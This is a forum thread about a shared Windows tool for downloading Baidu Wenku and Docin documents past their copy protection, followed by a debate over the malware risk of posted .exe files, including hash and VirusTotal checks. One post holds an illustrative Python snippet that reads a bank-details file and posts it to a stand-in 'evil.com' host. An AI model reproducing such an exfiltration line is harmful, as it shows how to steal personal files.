Chinese-forums.com

Tool for downloading Baidu Wenku, Docin etc.



markhavemann

Download documents from Baidu Wenku 百度文库, Docin.com 豆丁网 and similar sites. 

 

冰点下载器 - fish.exe

- preserves formatting, including tables

- exports to PDF and TXT

- works on all the sites and documents I've tried so far (not that many) 

 

Homepage (probably): http://www.bingdian001.com/  - might need a VPN?

Also available from other questionable sites around the Chinese internet so be cautious. 

 

I've also included the version (June 2020) that I downloaded (but can't remember from where) which I've used for two months+ and seems to be free of malware.

 

idocdown_3.2.12.rar

 

Some screenshots

 

clipImage_13082020080724.thumb.png.e15f39adb62d107f42d7581a63ecb76a.png

 

 

clipImage_13082020082712.thumb.png.bcaa6992450b8e5e338d9e1b8b40d771.png

clipImage_13082020082633.thumb.png.0f27f5689b691efcd8e7505e78c7490c.png


Demonic_Duck

Can you give an example of a page with text you can't download/copy? There are other ways of doing this in the browser that don't require running unknown .exe files.

889

We've waved red flags here before about people posting .exe files for download. Same poster in fact.

 

And let's add a reminder that virus checkers are hardly foolproof.

 

 

大块头

I'd be nervous about unverified programs like this installing a keylogger to steal passwords and credit card numbers... The best-case scenario is that it installs adware and bogs down your machine.

 

I'll assume that Mark is using this software on a virtual machine or a computer he doesn't care about. :wink:

markhavemann
5 hours ago, 大块头 said:

I'll assume that Mark is using this software on a virtual machine or a computer he doesn't care about.

Hardly. Windows 10 has almost daily security updates and the built in anti virus seems to be extremely thorough.

 

Not to mention Chrome scans every file and flags anything suspicious before Windows even has a chance.

 

I'm pretty confident that anything that gets past both Chrome and the Windows built in anti virus (how hasn't this put Norton out of business already?) is safe.

 

10 hours ago, 889 said:

And let's add a reminder that virus checkers are hardly foolproof.

Really? How often have you gotten viruses from files that you download but are missed by both Windows 10 anti virus and Chrome? Plus whatever else you choose to scan it with.

 

I'm (obviously) quite liberal with what I'll run on my computer and it's been a very very very long time since I got anything even slightly malicious.

 

 

10 hours ago, 889 said:

We've waved red flags here before about people posting .exe files for download. Same poster in fact.

Ever wanted to download something only to find that all the links are broken? It's pretty annoying, so I posted my copy. 

 

This is the internet, it's important to be cautious. If you don't feel comfortable with something, don't download it, but that doesn't mean that I shouldn't post exe's just because some people don't believe in or trust anti virus software.

 

10 hours ago, Demonic_Duck said:

Can you give an example of a page with text you can't download/copy? There are other ways of doing this in the browser that don't require running unknown .exe files.

Sure, I'll add some screenshots to the post. There are other ways like disabling their functions that block copying and stuff, but it's really annoying and the formatting often gets messed up. This even preserves tables which is nice.

philwhite
14 hours ago, markhavemann said:

I'll add some screenshots to the post

Rather than screenshots, could you please post the links in plain text to the forum ... or the link to the search pages and the search term? That would be easier for us to follow and understand the difficulty you describe.

 

markhavemann
11 minutes ago, philwhite said:

Rather than screenshots, could you please post the links in plain text to the forum ... or the link to the search pages and the search term? That would be easier for us to follow and understand the difficulty you describe.

I just realised that I misunderstood Demonic_Duck's post. I've still added some screenshots anyway. 

 

I'm not having any difficulties.

 

To be clear: 

I found this a few months ago and it downloads into PDF and TXT in a few seconds. It works on a bunch of sites. It's convenient and I wanted to share it. I didn't make it myself nor do I have any ties to anybody who did. 

 

**If you don't trust your anti virus software, don't download.

**If you are unsure about this application, search for it on Baidu (百度一下) and check that it has a legitimate user base and hasn't been flagged as containing malware or adware.

**If you don't trust files that I post, go and download it from somewhere else (seems like the guy who makes it has a little website http://www.bingdian001.com/).

889

There are very very good reasons why responsible people do not post .exe files. They post links to the developer's site or to a trusted third-party site like Tucows. And responsible people know why this is the practice. They don't become defensive when the risks are pointed out.

 

Frankly, you'd have to be a complete idiot to download one of the executables the OP has posted on this forum.

Demonic_Duck
30 minutes ago, markhavemann said:

I just realised that I misunderstood Demonic_Duck's post. I've still added some screenshots anyway.

 

You still haven't posted any links. But upon browsing some files I can see how copying is an issue. Looks like they've gone to great lengths to mangle the formatting when it's pasted into other programs.

 

23 minutes ago, 889 said:

Frankly, you'd have to be a complete idiot to download one of the executables the OP has posted on this forum.

 

Bit harsh. Plenty of otherwise intelligent folks aren't especially savvy about computer security. But yeah, I'd much rather pay the 8.88 CNY to buy the document rather than take the risk...

philwhite
1 hour ago, Demonic_Duck said:

upon browsing some files I can see how copying is an issue. Looks like they've gone to great lengths to mangle the formatting when it's pasted into other programs.

Yes, looking at this page https://wenku.baidu.com/view/d4d2e1e3122de2bd960590c69ec3d5bbfd0adaa6 I reached the same conclusion. It looks like Baidu have scanned various documents from other sources and then, rather than post them as PDF, they post this HTML with precise positioning of each sentence, or often of each individual character in a table. For example, this HTML fragment:

  • <p class="reader-word-layer reader-word-s3-0" style="width:761px;height:190px;line-height:190px;top:1974px;left:1429px;z-index:145;false">语文园地</p>

This is all wrapped in a div class="reader-container" and a div class="reader-page" with some JavaScript to render the text. If you try to scroll down, you can click to see more and then have to pay to view the rest of the document or download it in another format. There is a copyright notice at the end of the HTML:

  • <div>京ICP证030173号  京网文[2013]0934-983号  Copyright  ©<span id="copyright-date">2020</span> Baidu<div class="line"></div>由 百度云 提供计算服务</div>

It looks like Baidu are attempting to monetize someone's document content.
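To illustrate why plain copy-paste comes out mangled, and how the text could in principle be put back in reading order, here is a minimal Python sketch. It assumes every text fragment is a p element carrying the reader-word-layer class with top/left pixel values in its style attribute, as in the fragment quoted above. The names WordLayerParser and extract_text are made up for this example, and real pages may well need more handling than this.

```python
import re
from html.parser import HTMLParser


class WordLayerParser(HTMLParser):
    """Collect (top, left, text) for each <p class="reader-word-layer ...">."""

    def __init__(self):
        super().__init__()
        self.fragments = []  # list of (top, left, text) tuples
        self._pos = None     # (top, left) while inside a matching <p>
        self._text = []

    @staticmethod
    def _px(style, prop):
        # Match the property only at the start or after ';' so that
        # e.g. "margin-top" is not mistaken for "top".
        match = re.search(r"(?:^|;)\s*" + prop + r":\s*(\d+)px", style)
        return int(match.group(1)) if match else 0

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        classes = (attrs.get("class") or "").split()
        if tag == "p" and "reader-word-layer" in classes:
            style = attrs.get("style") or ""
            self._pos = (self._px(style, "top"), self._px(style, "left"))
            self._text = []

    def handle_data(self, data):
        if self._pos is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "p" and self._pos is not None:
            self.fragments.append((*self._pos, "".join(self._text)))
            self._pos = None


def extract_text(html):
    """Return fragment texts ordered top-to-bottom, then left-to-right."""
    parser = WordLayerParser()
    parser.feed(html)
    parser.close()
    return [text for _top, _left, text in sorted(parser.fragments)]
```

Sorting by the pixel coordinates is the whole trick here: the order of the elements in the HTML need not match the visual order, which is presumably why pasted text ends up scrambled.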

大块头
Quote

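Copyright notice: this document was provided and uploaded by a user. If the content infringes any rights, please report it or claim it. (版权说明:本文档由用户提供并上传,若内容存在侵权,请进行举报或认领)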

 

Or incentivizing people to post things they don't necessarily own. Reminds me of Scribd.

philwhite

 

4 hours ago, markhavemann said:

seems like the guy who makes it has a little website http://www.bingdian001.com/

That site didn't work for me but this site seems to list it https://www.gycc.com/n/15906.html

 

Also this site has a similar file, fish.exe, with its MD5 listed, and the hash matched when I downloaded the file and checked it. However, the archive posted by the OP contains a Fish.exe which claims to be the same product version (3.2.0.0) and the same file version (3.2.3.0), but it is slightly larger and so, of course, has a different MD5.
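For anyone who wants to repeat that kind of check, a minimal Python sketch follows. The function names file_md5 and matches_published are made up for this example, and the path and published hash are whatever you supply.

```python
import hashlib


def file_md5(path, chunk_size=1 << 20):
    """Return the hex MD5 digest of a file, read in chunks to limit memory use."""
    digest = hashlib.md5()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def matches_published(path, published_md5):
    """Compare a file's MD5 with a published value, ignoring case and whitespace."""
    return file_md5(path) == published_md5.strip().lower()
```

A match only tells you the file is byte-for-byte the one the download site lists, not that the file is safe. MD5 is also no longer considered collision resistant, so a SHA-256 value is preferable whenever a site publishes one.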

 

No hits on malware checks so far, but it would be cool if we were the first to spot some new malware. No time to play with VMs today. Virustotal report on the OP's Fish.exe looks fine  - it looks like it might export pdfs and pngs, as you'd expect.

 

Taking a look at the other files in the OP's .rar, I checked ssleay32.dll and libeay32.dll because, although they are needed for HTTPS, they could be used for C&C (command and control). Both DLLs check out fine on Virustotal but, on the Relations tab under Execution parent, I noticed a Fish.exe scanned on 9 August 2020. According to Virustotal's report, that was a different, malicious version of Fish.exe.

 

So, there are other malicious versions of Fish.exe circulating with exactly the same File Version Information (Copyright, Product, Description, File Version) as the Fish.exe which OP posted.

 

markhavemann
6 hours ago, philwhite said:

It looks like Baidu are attempting to monetize someone's document content.

I really hate seeing websites do this. It seems to be quite common in China. The number of websites charging for pirated content or content that they don't own themselves is way too high. 

 

5 hours ago, philwhite said:

Virustotal report on the OP's Fish.exe looks fine  - it looks like it might export pdfs and pngs, as you'd expect.

Thanks for not completely panicking, and doing an actual virus check instead of freaking out as soon as you see "rar" or "exe" 

 

5 hours ago, philwhite said:

So, there are other malicious versions of Fish.exe circulating with exactly the same File Version Information (Copyright, Product, Description, File Version) as the Fish.exe which OP posted.

I'm always cautious downloading stuff from the Chinese internet, hence my posting what seems to be a clean version. It's at least two months old and if it hasn't been flagged by some or other anti virus I think there is really no reason to think it's malicious.

 

At any rate, my bank account hasn't been emptied yet, nor has my computer imploded, exploded, or any other form of -ploded from using this, so I'll keep using it and I'll keep the post up unless the admins have a problem with it. 

 

markhavemann
9 hours ago, 889 said:

Frankly, you'd have to be a complete idiot to download one of the executables the OP has posted on this forum.

I didn't see you freaking out about the python script posted a few days ago.

 

I'm not a Python expert but I know that python can register hotkeys and grab keypresses, it can also send and receive data over the internet. I don't think those libraries or a script using them would even be flagged by chrome or anti virus software.

 

OP even tells you how to install Python and run his script without any knowledge of Python code, so anybody could easily run it without having any idea what it's doing. Yes it's on GitHub, but here is a link to an actual Python keylogger on GitHub (https://github.com/secureyourself7/python-keylogger) so that doesn't really make it trustworthy, does it?

 

I think being a little extreme in your caution is better than being the kind of person who just downloads and runs anything from the internet, but maybe it's better to do a little research and inform ourselves rather than making wild statements without any proof to back them up.

Edit

You'd better expand your crusade to posts containing Microsoft Word and Excel documents too, as they can contain macro viruses. One of the most famous viruses, Melissa, was spread via Word documents.

 

Or do you trust the part of anti virus software that scans documents, but not the part that scans exe's?...

 

https://thehackernews.com/2016/02/locky-ransomware-decrypt.html

Demonic_Duck
6 hours ago, markhavemann said:

I didn't see you freaking out about the python script posted a few days ago.

 

Python source code typically looks something like this:

...
with open('bank_details.txt') as f:
  data = f.read()
  requests.post(url = 'https://www.evil.com', data = data)

...

 

It might be intentionally obfuscated by its author to help hide its true purpose, but it would then at least be visible that it had been obfuscated and hence couldn't be trusted.

 

Meanwhile, an .exe file would look more like this, if you tried to open it in a text editor:

 

...x��U�n1}_i�aM$�/c{-E�6�%�H��>�> ��V��4U�~}�k��B�HA���Ό�̑g;�����t� ��t# �y�#�.�g���`P��>�>��2ς%��u�w�ȳ��b:�7�}��y=J�[8=�\W�]ggpޭ �SGJᔧ<�眏)...

 

With some technical expertise and specialized tools, you can reverse engineer it to get something similar to the source code (but not exactly the same). Such reverse engineered code is always heavily obfuscated - not intentionally, but because compiling code is a lossy process. You therefore have no way of knowing if it's likely to be malicious without combing carefully through it, which is no easy task, even for experts.

 

Antivirus software can short-circuit all of this by checking file hashes against lists of already known malicious software and perhaps by some other clever methods, but this is never going to be a foolproof method of detection for new and unknown viruses.
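As a rough illustration of the hash-list idea and its blind spot, here is a small Python sketch. The byte strings and the blocklist are invented for the example, and real antivirus products use far more than exact hash matching.

```python
import hashlib


def sha256_hex(data: bytes) -> str:
    """Return the hex SHA-256 digest of some bytes."""
    return hashlib.sha256(data).hexdigest()


def is_known_bad(data: bytes, known_bad_hashes: set) -> bool:
    """True only if these exact bytes have been seen and listed before."""
    return sha256_hex(data) in known_bad_hashes


# Hypothetical sample standing in for a previously catalogued malicious file.
known_sample = b"pretend these bytes are a known malicious program"
blocklist = {sha256_hex(known_sample)}

# Changing even one byte produces a completely different hash.
modified_sample = known_sample + b"\x00"

print(is_known_bad(known_sample, blocklist))     # True
print(is_known_bad(modified_sample, blocklist))  # False
```

The second result is the point: a lookup against known hashes says nothing about a file nobody has catalogued yet, including a trivially altered copy of something already listed.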

philwhite
7 hours ago, markhavemann said:

At any rate, my bank account hasn't been emptied yet,

"Give us another week or two, we are still encrypting your hard drive (and decrypting files on the fly on access). We are only doing it slowly so that you won't notice. Then we'll send you the ransomware note next month when we are done encrypting most of your files" 🤑

 

12 minutes ago, Demonic_Duck said:

but this is never going to be a foolproof method of detection for new and unknown viruses.

Exactly. Though inserting attacks which aren't novel into popular, frequently downloaded software is more common.

Demonic_Duck
6 hours ago, markhavemann said:

You'd better expand your crusade to posts containing Microsoft Word and Excel documents too, as they can contain macro viruses. One of the most famous viruses, Melissa, was spread via Word documents.

 

All modern versions of Word disable automatic macro execution unless you allow it on a file-by-file basis or intentionally re-enable it globally.

 

Also, Word macros are written in VBA. Like Python, VBA is an interpreted language, meaning you can easily examine its source code. (Unlike Python, VBA is a horrible steaming pile of 💩, but that's another story...)
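If you just want to know whether an Office file carries macros at all before opening it, a minimal Python sketch is below. It relies on the fact that the modern formats (.docx, .docm, .xlsx, .xlsm) are ZIP archives and that a VBA project is stored in a part named vbaProject.bin. The function name has_vba_project is made up for this example, and the older binary .doc and .xls formats are not ZIP files, so this check does not cover them (zipfile raises BadZipFile for those).

```python
import zipfile


def has_vba_project(path_or_file) -> bool:
    """Return True if an Office Open XML file contains a VBA project part.

    Accepts a filesystem path or a binary file-like object.
    """
    with zipfile.ZipFile(path_or_file) as archive:
        return any(
            name.lower().endswith("vbaproject.bin")
            for name in archive.namelist()
        )
```

This only detects that macros are present. Reading the VBA itself still means opening the file in the Office macro editor (with macros left disabled) or using a dedicated extraction tool.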

Link to post
Share on other sites

"Plenty of otherwise intelligent folks aren't especially savvy about computer security."

 

Maybe 10 or 15 years ago this was true. But by now, just about everyone knows you shouldn't click on an .exe file you get in an email, even if the email seems to come from a trusted friend. This is no different.

 

And if a file called fish.exe doesn't raise your suspicions . . .

Link to post
Share on other sites

From our point of view (well, mine, at least)

1) I do get slightly nervous about people posting .exe files, but there are legitimate cases - various people have used the forum to host software they've written. We'd be particularly sceptical about a new poster doing it. But it's not like our saying no would make much odds, you could just put it on a file-sharing site and the exact same people will download it, and as has been amply pointed out, the risks aren't what they once were.

2) What we don't like is hosting, without good reason, resources other people have produced and still provide. That gets into issues of copyright and good manners. As far as I can tell the original site for this isn't working, but it'd be appreciated if the first post could be edited with a link and whatever info is available. Credit where it's due and all that. If there's a reliable official download site, a link to that is preferred, rather than us hosting someone else's possibly out-of-date work.

3) This was a lot more discussion than needed. 

  • 7 months later...
markhavemann

My version of this doesn't seem to download from Baidu anymore; they must have updated the way they do things.

 

Sadly it seems like the developer has taken this down from his own page too. Quite a pity. Here's the message he put up, if anyone is interested:

 

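"Due to various pressures and other reasons, maintenance and downloads of the Bingdian software have been discontinued." (由于各种压力等原因,停止冰点软件维护和下载。)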

